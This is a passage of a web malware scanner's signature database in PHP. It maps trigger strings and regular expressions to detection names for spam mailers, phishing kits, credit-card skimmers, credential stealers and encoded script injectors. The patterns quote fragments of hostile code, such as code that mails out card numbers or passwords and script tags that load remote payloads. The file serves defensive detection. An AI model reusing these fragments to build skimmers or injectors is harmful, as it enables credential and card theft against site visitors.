		'echo "<b>".$count." Mail(s) sent</b><br><br>";' => array(STR_CLEARFILE, 'php.hacktool.mailer.040', NULL),
	),

	'public function processLogin()' => array(STR_TRIGGER,
		'@mail($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.login-stealer.002', '\\$to[\\s]*=[\\s]*"[^;]+;[\\s]*\\$subject[^{]+?([\\s]*\\$sentmail[\\d\\s]*=[\\s]*@mail[^;]+;){1,}'),
	),

	'function cek_email($file' => array(STR_TRIGGER,
		'buka_dir($cwd);' => array(STR_CLEARFILE, 'php.hacktool.mailstealer.002', NULL),
	),

	'->getMessage' => array(STR_TRIGGER,
		'\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*try[\s]*\{[\s]*mail\(\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\);[\s]*\}[\s]*catch[\s]*\([^\)]+Exception[\s]*\$[\w]*\)[\s]*\{[\s]*echo[\s]*\$[\w]*->getMessage\(\);[\s]*return;[\s]*\}[\s]*echo[\s]*.[\w]+..;' => array(REX_CLEARFILE, 'php.hacktool.mailer.116', NULL),
	),

	'."/.accesshash";$' => array(STR_TRIGGER,
		';ob_start();echo"http://$' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.010', NULL),
	),

	' = file_get_contents(\'http:' => array(STR_TRIGGER,
		'$from_email = "$name<$SendEmail>";' => array(STR_CLEARFILE, 'php.hacktool.mailer.064', NULL),
	),

	'$Card = $_POST[\'ccnumber\'];' => array(STR_TRIGGER,
		'$hostname = gethostbyaddr($ip);' => array(STR_CLEARFILE, 'php.phishing.generic.041', NULL),
	),

	'private function check_virginmedia' => array(STR_TRIGGER,
		'connect_imap(\'imap.us.army.mil' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.002', NULL),
	),

	'$body=$back;' => array(STR_TRIGGER,
		'$back=$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];' => array(STR_CLEARFILE, 'php.hacktool.mailer.144', NULL),
	),

	'<form method="post">' => array(STR_TRIGGER,
		'mail($_POST[\'email\'],"Test done by' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.004', NULL),
	),

	'foreach($_POST' => array(STR_TRIGGER,
		'if(isset($_POST[\'cardtype\'])||isset($_POST[\'cardzip' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.014', 'if\(isset\(\$_POST\[.cardtype.\]\)\|\|isset\(\$_POST\[.cardzip.\]\)\)\{[\s]*\$[\w]+=..;[\s]*foreach\(\$_POST[\s]*as[\s]*\$[\w]+=>\$[\w]+\)\{[\s]*\$[\w]+\.=\$[\w]+\...[\s]*.\.\$[\w]+\...n.;[\s]*\}[\s]*mail\(.[\w]+@[^;]+\);[\s]*\}'),
	),

	'echo "xxx"."sent!";' => array(STR_TRIGGER,
		'$msg .= "--". $boundary . "\n";' => array(STR_CLEARFILE, 'php.mailer.generic.023', NULL),
	),

	'mail($_POST[' => array(STR_TRIGGER,
		';} else {echo' => array(STR_CLEARFILE, 'php.mailer.generic.038', NULL),
	),

	'<title> .:| PHPMailer |::.' => array(STR_CLEARFILE, 'php.hacktool.mailer.075', NULL),
	'Result Report Test - ".$xx,"WORKING !");' => array(STR_CLEARFILE, 'php.hacktool.mailer.072', NULL),
	'echo \'Terminou...<br>\';' => array(STR_CLEARFILE, 'php.mailer.generic.034', NULL),
	'echo "uploadezeez <br>";' => array(STR_CLEARFILE, 'php.hacktool.mailer.059', NULL),
	'else{echo "$email : NON :(";}' => array(STR_CLEARFILE, 'php.hacktool.mailer.063', NULL),
	'$pay.base64_decode(\$_COOKIE[\'__bill\']));' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.068.02', NULL),
	'"Important Information - ".$xx,"WORKING !");' => array(STR_CLEARFILE, 'php.hacktool.mailer.049', NULL),
	'{echo \'done\';} else {echo \'not : \'.$' => array(STR_CLEARFILE,'php.hacktool.mailer.028', NULL),
	'->set_message($_POST[\'data\']);' => array(STR_CLEARFILE, 'php.mailer.POST.006', NULL),
	'"ADFLY             : ".$_POST[\'email\']."\n";' => array(STR_CLEARFILE, 'php.mailer.POST.007', NULL),
	'$txtspamed = "spammed";' => array(STR_CLEARFILE, 'php.mailer.POST.002.004', NULL),
	'$_POST[\'eMailAdd\']."\n";' => array(STR_CLEARFILE, 'php.mailer.POST.008', NULL),
	'NgA GrOfI hACk' => array(STR_CLEARFILE, 'php.mailer.GrOfI.001', NULL),
	'style1"><u>madnet private mail-worker</u>' => array(STR_CLEARFILE, 'php.mailer.madnet_mail_worker.001', NULL),
	'=BANKZ=' => array(STR_CLEARFILE, 'php.mailer.BANKZ.001', NULL),
	'function win_COOKIEmxrr(' => array(STR_CLEARFILE, 'php.mailer.COOKIE.001', NULL),
	'echo "OK enviado~";' => array(STR_CLEARFILE, 'php.mailer.POST.004.06', NULL,1),
	'|ArHack.NeT;)|' => array(STR_CLEARFILE, 'php.mailer.generic.007', NULL),
	'HunTerZ Family' => array(STR_CLEARFILE, 'php.mailer.generic.001', NULL),
	'SpamZ ReZulT - MoreArt' => array(STR_CLEARFILE, 'php.mailer.generic.001.001', NULL),
	'/* Sandy 2013 - Best Email Marketing Tool' => array(STR_CLEARFILE, 'php.mailer.Sandy.001', NULL),
	'echo "[XBOOMBER & XHAT]' => array(STR_CLEARFILE, 'php.mailer.XBOOMBER_XHAT.001', NULL),
	'mail($name,$email_subject,$email_message,$headers);sleep (1);print' => array(STR_CLEARFILE, 'php.hacktool.mailer.096', NULL),
	'/_/\_\_|   \__,_|_| |_| |_|' => array(STR_CLEARFILE, 'php.hacktool.mailer.102.02', NULL),
	'<meta http-equiv="refresh" content="0;URL=\'https://www.desjardins.com/' => array(STR_CLEARFILE, 'html.phishing.desjardins.002', NULL),
	'===USER CREATED==' => array(STR_CLEARFILE, 'php.phishing.mailer.075', NULL),
	'echo("<font color=red>Not Support For Mailer</font>"); } ?>' => array(STR_CLEARFILE, 'php.hacktool.mailer.127', NULL),
	'window.location.href="http://docs.google.com/";' => array(STR_CLEARFILE, 'html.phishing.googledocs.008', NULL),
	'----> wait ".$_GET[\'time\']." Segs. Sending to ".' => array(STR_CLEARFILE, 'php.hacktool.mailer.036', NULL),
	'Dead Script Zeroo' => array(STR_CLEARFILE, 'js.phishing.dead_script_zeroo.001', NULL),
	'if($pass!="" && md5("IMAIL".$_POST[\'pass\'])!=$pass) {' => array(STR_CLEARFILE, 'php.mailer.POST.014', NULL),
	'$_rmessage = str_replace("XXRANDOMXX", $rnx, $_message);' => array(STR_CLEARFILE, 'php.mailer.generic.008', NULL),
	'PostMan Full ' => array(STR_CLEARFILE, 'php.hacktool.postman-full.001', NULL),
	'\$emaillist[\s]*=[\s]*\$_POST\[.emaillist.\];' => array(REX_CLEARFILE, 'php.hacktool.mailer.002', NULL),
	'for($x=0; $x<$numemails; $x++){' => array(STR_CLEARFILE, 'php.hacktool.mailer.004', NULL),
	'if(!empty($_GET[\'ora\']) && $_GET[\'ora\']==\'test\')' => array(STR_CLEARFILE, 'php.hacktool.mailer.023', NULL),
	'scan inb0x hotmail' => array(STR_CLEARFILE, 'php.hacktool.scan-inb0x-hotmail.001', NULL),
	'made by http://tool4spam.com ' => array(STR_CLEARFILE, 'php.hacktool.mailer-tool4spam.001', NULL),
	'$email = $_POST[\'otkogo\'];' => array(STR_CLEARFILE, 'php.hacktool.mailer.001', NULL),
	'$headers.= "From: Bradesco' => array(STR_CLEARFILE, 'php.phishing.mailer.053', NULL),
	'echo(\'Sent \'.$message_in_min.\' messages. Pause 60 sec' => array(STR_CLEARFILE, 'php.hacktool.mailer.012', NULL),
	';class DeleteOnExit {function __destruct(){unlink(__FILE__);}}$g_delete_on_exit = new DeleteOnExit();echo \'good\';' => array(STR_CLEARFILE, 'php.hacktool.mailer.013', NULL),
	'</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>' => array(STR_CLEARFILE, 'php.hacktool.mailer.008', NULL),
	'$x = unserialize(base64_decode($_POST[\'task\']));' => array(STR_CLEARFILE, 'php.hacktool.mailer.009', NULL),
	'..::S3nd3r MAIL::..' => array(STR_CLEARFILE, 'php.hacktool.mailer-S3nd3r.001', NULL),
	'$strr3 = stripslashes($_POST["info"]);' => array(STR_CLEARFILE, 'php.hacktool.mailer.011', NULL),
	'mail($rezmail1' => array(STR_CLEARFILE, 'php.mailer.generic.014', NULL),
	'mail($xmail,"FreeMobile | ".$_SESSION[\'name' => array(STR_CLEARFILE, 'php.mailer.POST.004.09', NULL),
	'.= "Client IP : "' =>  array(STR_CLEARFILE, 'php.hacktool.mailer.014', NULL),
	'$urltopost = "https://id.orange.fr/auth_user2/bin/auth_user.cgi/' => array(STR_CLEARFILE, 'php.hacktool.mailer.015', NULL),
	'$MessageSubject = base64_decode($_POST["msgsubject"]);' => array(STR_CLEARFILE, 'php.mailer.POST.005.02', NULL),
	'Ghost! Wire' => array(STR_CLEARFILE, 'php.mailer.generic.015.001', NULL),
	'$msg .= "Password : ".$_POST[' => array(STR_CLEARFILE, 'php.mailer.generic.016', NULL),
	'$PHPprotectV20 = array("X-Mailer: The Bat!' => array(STR_CLEARFILE, 'php.mailer.generic.017', NULL),
	'$message .= "PassWord: ".$_POST['=> array(STR_CLEARFILE, 'php.mailer.generic.018', NULL),
	'IP/Host Name DeTaiLZ'=> array(STR_CLEARFILE, 'php.mailer.generic.018.001', NULL),
	'$conteudo ="<b>INFO:</b> $agencia $conta-$digito <b>SH4:</b> $infor <b>SH6:</b> $resultado_ss6 <b>CPF:</b> $cpf<br>";' => array(STR_CLEARFILE, 'php.phishing.brphisher.002', NULL),
	'$conteudo.="<b>CARD:</b> $ver01-$ver02-$ver03-$ver04 <b>VAL:</b> $mes/$ano <b>V/T:</b> $via-$tip <b>CVV:</b> $cvv<br>";' => array(STR_CLEARFILE, 'php.phishing.brphisher.003', NULL), 
	'usuario BANCOLOMBIA (".$ip' => array(STR_CLEARFILE, 'php.phishing.bancolombia.001', NULL),
	'.= "Password : ".$_POST[\'Passwd\']."\n' => array(STR_CLEARFILE, 'php.phishing.mailer.008', NULL),
	'= "From: Cielo <' => array(STR_CLEARFILE, 'php.phishing.cielo_mailer.001', NULL),
	'document.location.replace(\'https://particuliers.secure.lcl.fr/' => array(STR_CLEARFILE, 'php.phishing.lcl_fr.001', NULL),
	'window.location="http://www.halifax.co.uk/' => array(STR_CLEARFILE, 'php.phishing.halifax.001', NULL),
	'>Bulk Mailer By' => array(STR_CLEARFILE, 'php.hacktool.mailer.021', NULL),
	'$mail->addAddress(\'tsegadora@yahoo' => array(STR_CLEARFILE, 'php.hacktool.mailer.026', NULL),
	'$arr=array($bilsnd, $IP);' => array(STR_CLEARFILE, 'php.phishing.mailer.025', NULL),
	'$msg = "DHL Info' => array(STR_CLEARFILE,'php.mailer.POST.025', NULL),
	'sendstatus.document.write(\'<title>MailMailer Status</title></head>' => array(STR_CLEARFILE, 'php.hacktool.mailmailer.001', NULL),
	'~!BOA Client!~' => array(STR_CLEARFILE, 'php.mailer.BOAClient.001', NULL),
	'$isi=\'Usermail: \'.$login[\'username' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.magento-login.002', '\\$postmage = base64_decode."[^:]+\\$isi=.Usermail:[^:]+Password[\\s]*:[^;]+;[\\s]+mail\\([^;]+;[\\s]*mail\\([^;]+isi\\);'), 
	'=========== VECTIM PC' => array(STR_CLEARFILE, 'html.phishing.paypal.002', NULL),
	'This email is to confirm that you recently made a Funds Transfer' => array(STR_CLEARFILE, 'html.phishing.westpac.001', NULL),
	'require("send.php"); file_put_contents($_SESSION[\'success\'], $rx, FILE_APPEND); print' => array(STR_CLEARFILE, 'php.phishing.freemobs.001', NULL),
	'$SubjectLine = "Hotmail $ip";' => array(STR_CLEARFILE, 'php.phishing.generic.013', NULL),
	'mailer($adminemail,$adminemail,"New info",$fcontent);' => array(STR_CLEARFILE, 'php.phishing.generic.011', NULL),
	'Created BY Mr.HiTman' => array(STR_CLEARFILE, 'php.phishing.hitman.002', NULL),
	'$VictimInfo .= "' => array(STR_CLEARFILE,'php.phishing.generic.022', NULL),
	'$msg=$name."<br/>".$num."<br/>".$mon."<br/>".$yr."<br/>".$cid."<br/> ok";' => array(STR_CLEARFILE, 'php.phishing.cc_mailer.001', NULL),
	'$msg=$eemail."<br/>".$pass."<br/><br/> ok"; $pay=$eemail;' => array(STR_CLEARFILE, 'php.phishing.mailer.015', NULL),
	'mail($xmail,"FreeMobile | ".$_POST[\'comname' => array(STR_CLEARFILE,'php.mailer.POST.031', NULL),
	'$reply .= "< 354 OK.";' => array(STR_CLEARFILE, 'php.hacktool.mailer.035', NULL),
	'echo "<H2>Sent! vseravno</H2>";' => array(STR_CLEARFILE,'php.mailer.POST.033', NULL),
	'if (isset($_POST[\'mail_per\'])) {$max_send_per_interval = $_POST[\'mail_per\'];} else {$max_send_per_interval = 1;}' => array(STR_CLEARFILE,'php.mailer.generic.021', NULL),
	'post[\'cc_cvv2\']."|".$this->request->post[\'cc_number\'];mail("' => array(STR_CLEAR_LINEMATCH,'php.malware.magento-cc-stealer.039', '[\\s]*.smail=.order_info[^;]+this->request->post..cc_number...mail."[^;]+"\\);'),
	'echo "Mail:".mails().\',Etc:\'.base64_encode(etcpasswd());' => array(STR_CLEARFILE,'php.hacktool.mailer.041', NULL),
	'$replyTo=leafTrim($_POST[\'replyTo\']);' => array(STR_CLEARFILE, 'php.hacktool.spamtool.002', NULL),
	'$smail=$order_info[\'order_id\']."|".$order_info[\'payment_' => array(STR_CLEAR_MULTIMATCH, 'php.malware.opencart-cc-stealer.001', '\$smail=\$order_info\[\'order_id\'\]\."\|"\.\$order_info\[\'payment_[^;]+?;\s*mail\s*\((?:[^,]+?,){2}\s*\$smail[^;]+?;'),
	'function aol($mail,$pass, $_sock){' => array(STR_CLEARFILE, 'php.phishing.mailer.037', NULL),
	'$txt .= "USER:' => array(STR_CLEARFILE, 'php.hacktool.mailer_gen.004', NULL),
),

'<script' => array(STR_TRIGGER,

	'document' => array(STR_TRIGGER,

		'document.write(' => array(STR_TRIGGER,

			'/js/jquery.min.php' => array(STR_TRIGGER,

				'/js/jquery.min.php?' => array(STR_TRIGGER,
					');if(document.referrer.indexOf(location.protocol+"//"+location.host' => array(STR_CLEAR_MULTIMATCH, 'html.malware.fake_jquery.002', '<script>\s*(:?var a=\'\';)?setTimeout\(1\d?\);if\(document.referrer.indexOf\(location.prot[^{<]+\{document.write..<script[^>]+jquery.min.php\?[^>]+window.location.host\)\).\'"><.\+..script>..;}<.script>'),
				),

				'/js/jquery.min.php\'' => array(STR_TRIGGER,
					'&utm_campaign' => array(STR_CLEAR_MULTIMATCH, 'html.malware.fake_jquery.003', '<script[^>]*>\s*(?:var\s*)?\w+\s*=[^\n]+document\.write\(.<script type=.text.javascript.\s*src\s*=\s*..\s*\+\s*.https?:..[^\/]+\/(?:[\.\w]+\/)*jquery\.min\.php[^&]+&utm_campaign[^&]+&utm_source[^{]+\{[^>]+><[^<]+<\/script>'),
				),
			),

			'document.write(output)</script></head></html>";' => array(STR_TRIGGER,
				'$ciphertext = AesCtr::encrypt($buffer, $key, $nBits);' => array(STR_TRIGGER,
					'function encrypt($buffer){' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.006', NULL),
				),
			),

			'.replace(' => array(STR_TRIGGER,
				'=unescape(' => array(STR_TRIGGER,
					'));document.write(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.019', '<script[^>]+[\w]+[\s]*=[\s]*.{100,1100}unescape\([\w]+\.replace\([^\)]+\)\);document.write\([\w]+\);<.script>'),
				),
			),

			'post_content\' => str_replace($string_to_test, \'\', $post->post_content)' => array(STR_WHITE,
				'.split("").reverse().join(""))</script>' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.065', 'if\s*\(preg_match\([\'"].checkout.i[\'"],\s*\$_SERVER\[[\'"]REQUEST_URI[\'"]\]\)\)\{\s*echo\s*[\'"]<script>document\.write\(.[\'"]>tpircs.<>[\'"][^<]+<.[\'"]\.split\([\'"][\'"]\)\.reverse\(\)\.join\([\'"][\'"]\)\)<.script>[\'"];\s*}'),
			),

			'encodeURI(navigator.userAgent)' => array(STR_TRIGGER,
				'encodeURI(document.referrer)' => array(STR_CLEAR_MULTIMATCH, 'js.malware.fake_jquery.003', 'document.write\(.<script[^;]+encodeURI\(document.referrer\)[\s]*\+[^\+]+\+[\s]*encodeURI\(navigator\.userAgent\)[\s]*\+[^;]+\);'),
			),

			'data:text/javascript;base64' => array(STR_TRIGGER,
				'ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJ' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unescape.002', 'function[\s]*getCookie\([\w]+\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*document.cookie.match\(new[\s]*RegExp\([^\>]+data:text.javascript;[\s]*base64,.{200,400}getCookie\(.[\w]+.\);[\s]*if\(now>=\(time=[\w]+\)\|\|void[^\}]+date\.toGMTString\(\),document\.write\(.<script.{0,100}\)\}'),
			),

			'atob(' => array(STR_TRIGGER,
				'PHNwYW4gaWQ9J2YxODllMjIyLTZkNDItMzZlY' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.022', 'var[\s]*encodedString[\s]*=[\s]*.{100,2000}.;[\s]*var[\s]*decodedString[\s]*=[\s]*atob\(encodedString\);[\s]*document.write\(decodedString\);'),
			),

			'\/\/url.ie\/' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.031', 'document.write\(\"<script\s*type=\\\\"text\\\\\/javascript\\\\"\s*src=\\\\"\\\\\/\\\\\/url.ie\\\\\/\w+\\\\"><\\\\\/script>"\);'),
			');}zdrViewState();' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-style.007', '<!-- \w+ -->\s*<script[^>]*>function zdrViewState\(\)\s*\{\s*var a=0,m.+;\}zdrViewState..;\s*<.script>\s*<p class="\w+">\s*.+?<.p>\s*<!-- \w+ -->'),
			'<script language=javascript>document.write(unescape(\'%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61' => array(STR_CLEAR_MULTIMATCH, 'js.defaced.HUMAN_CRAZY99.001', 'document\.write\(unescape\(.%..%..%..%[^\)]+\)+;[\s]*[\w]+\([^\)]+\)'),
			'if(isMobile() === true) {document.write(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.054', 'function\s*is[Mm]obile\(\)\s*{\s*var\s*\w+\s*=\s*\(navigator\.user[Aa]gent\|\|navigator\.vendor\|\|window\.opera\);\s*if\(.android\.\+mobile\|avantgo\|bada.\s*.\|blackberry\|blazer[^{]+{\s*return\s*true;\s*}\s*return\s*false;\s*}\s*if\(is[Mm]obile\(\)\s*===\s*true\)\s*{document\.write\(.<script[^>]+><.script>.\);\s*}'),
			'\/\*\w+\*\/\s*document\.write\(.<[script\'"+\s]+type=.text\/javascript.\s*src=.http' => array(REX_CLEAR_MULTIMATCH, 'js.malware.injector.042', '\/\*\w+\*\/\s*document\.write\(.<[script\'"+\s]+type=.text\/javascript.\s*src=.http:\/\/[^<]+<.[script\'"+\s]+>.\);\s*\/\*.\w+\*\/'),
			'echo (\'<script src="http://\'.$dmn.\'/dmn/js.php?q=\'.$pill.\'"></script>\')' => array(STR_CLEARFILE, 'php.spam-seo.injector.240', NULL),
			'document\.write\s*\(.<script\s*src\s*=\s*.http(?:s)?:[^>]+>\s*<(?:\\\x2f|\/)script>.\s*\)\s*;' => array(REX_CLEAR_LINEMATCH, 'js.malware.generic.036', 'document\.write\s*\(.<script\s*src\s*=\s*.http(?:s)?:[^>]+>\s*<(?:\\\x2f|\/)script>.\s*\)\s*;'),
			'.length);document.write(unescape(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.016.02', 'var [\w]+[\s]*=[\s]*.ABCDEFGHIJK[^;]+=.;[\s]*var [\w]+[\s]*=[\s]*.[\w+=]{50}[^}]+String\.fromCharCode\([^;]+;[\s]*\}[^>]+document\.write\(unescape[^;]+\);'),
			'.length);document.write(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.016', 'function\s*\w+\(\w+\)\s*{\s*var\s*\w+\s*=\s*[\'"][^;]+;\s*var\s*\w+\s*=\s*[\'"][^;]+;\s*var\s*\w+\s*[^\2]+while\(\w+<\w+\.length\);document\.write\(\w+[^;]+;\s*}\s*;\s*\w+\([\'"]PHNjcmlwdCB0[^;]+;'),
			'3c6120687265663d226d61696c' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.041', '<script\s*language=[^>]+>\s*..\s*[Cc]opyright[^"]+"3c6120687265663d226d61696c[^"]+".\w=..;for\((\w+)=\d;\1<\w\.length;\1\+=\d\)\{\w\+=unescape\(.%.\+\w\.substr\(\1,\d\)\);\}document\.write\(\w\);\s*<.script>'),
			'document.write(unescape(\'%3C%69%66%72%61%6D%65%20%73%74%79' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.011', '<script\s*language=[^>]+>\s*document.write\(unescape\(.%3C%69%66%72%61%6D%65%20%73%74%79[^<]+<.script>'),
			'3C696672616D65206E616D653D' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.015', 'function [\w]+\([\w]+\)[\s]*\{[^<]+return\(parseInt[^\}]+\}[^>]+document\.write\([\s]*[\w]+[\s]*\([^;]+\);'),
			'function xtrackPageview(){' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.xtrackPageview.001', '<script[^;]+function\s*xtrackPageview[^>]+document.write[^;]+;..x\[\w+\][^;]+;.<[^<]+xtrackPageview..;<.script><div[^>]+>[^\$]+?<.div>'),
			'<script>if ((navigator.userAgent.match(/' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.002', '<script>[\s]*if[\s]*\([\s]*\(navigator\.userAgent\.match\(.[\w]+.i\)[\s]*\)[\s]*\|\|[\s]*\(navigator\.userAgent[^\{]+\{[\s]*document\.write[^\}]+\}[\s]*<.script>'),
			'document.write( unescape( \'%3C%21%44%4F%43%54%59%50%js' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.004', '<script[^;<]+document.write.\s+unescape.\s+..3C.21.44.4F[^<;]+;[^>]+script>'),
			'var output = Aes.Ctr.decrypt(Turr, Hassan, $nBits);' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.002.02', NULL),
			'>Selamat Datang di AutoLikes' => array(STR_CLEARFILE, 'php.hacktool.fb_hack.001', NULL),
			'\x68\x74\x74\x70\x3a\x2f\x2f\x75\x72\x6c\x2e\x65\x78\x70\x6f\x67\x6f\x6c\x66\x2e\x63\x6e\x2f\x75\x72\x6c\x2e\x61\x73\x70\x3f' => array(STR_CLEARFILE, 'html.spam-seo.hidden-div.021', NULL),
			'+= String.fromCharCode(Math.floor((tmp/Math.pow(' => array(STR_CLEARFILE, 'js.defaced.generic.094', NULL),
			'%26%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%22%68%74%74%70%73%3a%2f%2f%67%6f%6f%2e%67%6c%2f' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.028','<script[^>]+>[\s]*document.write.unescape\(.%[^;]+%26%6c%6f%63%61%74%69[^;]+;[\s]*<.script>'),
			'text/javascript">document.write("<\/div>")</script>' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.006', '<script language[^>]+javascript.>[\s]*document\.write\(.<div style[^>]+-[\d]+[\s]*px[^>]+>.\)[\s]*<.script>[^@]+?document\.write\(.<..div>.\)[\s]*<.script>'),
			'3C%74%69%74%6C%65%3E%43%49%42%43%20' => array(STR_CLEARFILE, 'php.phishing.cibc.001', NULL),
			'3C%74%69%74%6C%65%3E%50%65%72%73%6F%6E%61%6C%20%42%61%6E%6B%69%6E%67' => array(STR_CLEARFILE, 'php.phishing.cibc.001.03', NULL),
			'//xmr.omine.org' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.025', 'document\.write\([\'"]<script\s*src=[\'"]https?:\/\/(\w+\.)?omine\.org\/[\w\/]+\.js[\'"]\s*>\s*<\/script>\s*<script>\s*\w+\([\'"]\w+[\'"][^\)]+\)\s*<\/script>[\'"]\)\s*;'),
			'%3c%21%44%4f%43%54%59%50%45%20%68%74%6d' => array(STR_CLEARFILE, 'js.phishing.encoded.002', NULL),
		),

		'iframe' => array(STR_TRIGGER,

			'"; document.body.appendChild(i);})();' => array(STR_TRIGGER,
				'(function(){var i = document.createElement("iframe"); i.style.display = "none";' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.002', '\\(function\\(\\)\\{var i = document.createElement\\("iframe"\\); i.style.display = "none"[^>]+"; document.body.appendChild.i.;}\\)\\(\\);'),
			),

			'/google_counter.php\');' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.003', '<script[^>]+>\s*iframe = document.createElement..iframe..;\s*[^;,<]+, .http:..[^\/\s]+\/google_counter.php.\);[^<]+appendChild.iframe.;\s*<.script>'),
		),

		'function get_style' => array(STR_TRIGGER,
			'} function end' => array(STR_CHAIN_TRIGGER,
				'{ return "none"; } function end' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-style.009', '<script type[^>]+>[\s]*function get_style[\w]*[\s]*\(\)[\s]*\{[\s]*return[\s]*"none";[\s]*\}[\s]*function end[\w]*[\s]*\(\)[\s]*\{[\s]*document\.getElementById\([^\)]+\)\.style\.display[\s]*=[\s]*get_style[\w]*[\s]*\(\);[\s]*\}[\s]*<.script>'),
				'<script type="text/javascript"> end' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-style.009.02', '<script type[^>]+>[\s]*end[\w]*[\s]*\(\);[\s]*<.script>'),
			),
		),

		'function(' => array(STR_TRIGGER,
			'setAttribute(' => array(STR_TRIGGER,
				'document.body||document.documentElement' => array(STR_TRIGGER,
					');})(document.createElement(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.createElement.007', '\(function\(([\w]+,?)+\)\{[\w]+\.src=[\w]+,[\w]+\.setAttribute\([^;]+\);\}\)[\s]*\(document.createElement\(.script.\),.http[^,]+,[\w]+,document\.body\|\|document.documentElement\)'),
				),
			),
		),

		'const SCRIPT_SRC' => array(STR_TRIGGER,
			'compact( \'sl\', \'redirect_option\', \'data1\', \'data2\', \'plugin_version\'' => array(STR_TRIGGER,
				'echo $redirect_to' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.005', NULL),
			),
		),

		';try{d=document.createElement("div");}catch(' => array(STR_TRIGGER, 
			'){e=eval;}ss=String;' => array(STR_TRIGGER, 
				')&&window.document)s+=ss["' => array(STR_CLEAR_MULTIMATCH,'js.spam-seo.injector.028', '<script>try.window.document.body\\+\\+\\}catch\\([\\w]+\\)\\{[\\w]+=[\\d]+;}[\\s]*if[^"]+document.createElement."div"[^,]+e=eval;\\}ss=String;[\\w]+=new Array\\(([\\d]+,){50,}[^&]+&&window.document.s\\+=ss[^;]+;}[\\s]*[\\w]*=[\\w]*;e\\(s\\);}<.script>'),
			),
		),

		'SESSION_ID1' => array(STR_TRIGGER,
			'exit(\'<script>document.location.href = ' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.session_id1.001', '<.php\s*.url = "http:[^"]+";\s*if\s*.isset.._SERVER..HTTP_REF[^\{]+\{ setcookie..SESSION_ID1",[^\}]+?exit..<script>document.location.href[^\}]+\}\s*\?\>'),
		),

		'isset($_POST[' => array(STR_TRIGGER,
			'<title>PHP Secure Professional Captcha' => array(STR_CLEARFILE, 'php.phishing.generic.065', NULL),
		),

		'navigator.userAgent.toLowerCase();function' => array(STR_TRIGGER,
			'script>l1l=' => array(STR_CLEARFILE, 'js.malware.fb-fakevideo.001', NULL),
		),

		'xploit_404string' => array(STR_TRIGGER,
			'logbox' => array(STR_CLEARFILE, 'php.hacktool.admin_page_finder.001', NULL),
		),

		'/i[_' => array(STR_TRIGGER,
			'if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.030', '<script[^>]+>var\s*_\w*=\["[^\]>]+\];[^>]+?if.\/.android\|bb.d\+\|meego\)[^>]+?zeto\|zte.-\/i\[[^>]+?<.script>'),
		),

		'<b>EMAIL QUOTA EXCEEDED LOGIN TO UPGRADE' => array(STR_CLEARFILE, 'js.phishing.generic.004', NULL),
		'+encodeURIComponent(document.referrer)+"&default_keyword="+encodeURIComponent(document.title),document.currentScript?' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.068', '<script[^>]*>\s*var\s*\w+=document,\w+=\w+\.createElement\(.\w+.\)\s*;\s*\w+\.src=[^<\+;]+\+encodeURIComponent\(document\.referrer\)\+.\&\w+=.\+encodeURIComponent\(document\.title\)[^:]+:\w+\.getElementsByTagName\([^;]+;<.script>'),
		'This website is not equipped with readability feature for Visually' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.089', 'jQuery\(document\)\.ready\(function\(\)\{\s+jQuery\(\'body\'\)\.append\(\'\<div\s+class=\"alert-box\"[^z]*z-index:.\d+[^O]*OTICE[^O]*Owner.of.[^\}]*\}\)\;'),
